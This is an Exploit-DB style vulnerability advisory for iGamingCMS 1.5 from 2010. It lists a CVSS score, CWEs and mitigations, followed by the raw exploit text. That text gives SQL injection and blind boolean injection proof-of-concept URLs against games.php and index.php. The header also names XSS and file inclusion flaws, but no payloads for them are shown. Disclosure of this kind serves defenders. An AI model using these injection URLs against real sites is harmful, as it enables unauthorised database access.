iGamingCMS1.5 multiple vulnirabilities

vendor:

iGamingCMS

by:

Sweet

7,5

CVSS

HIGH

SQL Injection, XSS, Local File Inclusion, Remote File Inclusion

89, 79, 22, 98

CWE

Product Name: iGamingCMS

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXp sp3

2010

iGamingCMS1.5 multiple vulnirabilities

iGaming CMS is a content management system designed for gaming websites.

Mitigation:

Input validation, Output encoding, File access control, URL filtering

Source

Exploit-DB raw data:

############################################################################
#                                                                          #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities                    #
#                                                                          #
# Date: 27/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link: http://www.igamingcms.com/                                #
#                                                                          # 
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5              #
#                                                                          # 
# Version:1.5                                                              #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : hight                                                             #
#                                                                          #
#                                                                          #
# Description : iGaming CMS is a content management                        #
#         system designed for gaming websites.                             # 
#                                                                          #
#                                                                          #
#                                                                          #
############################################################################

1-SQL injection:

http://www.example.com/igamingpath/games.php?order=1[SQLi]&section=111-222-1933email@address.tst&sort=desc

2-Blind injection:

http://www.example.com/igamingpath/games.php?order=title&section=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc

http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0


thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com

Saha Ftourkoum et 1,2,3 viva L'Algerie :))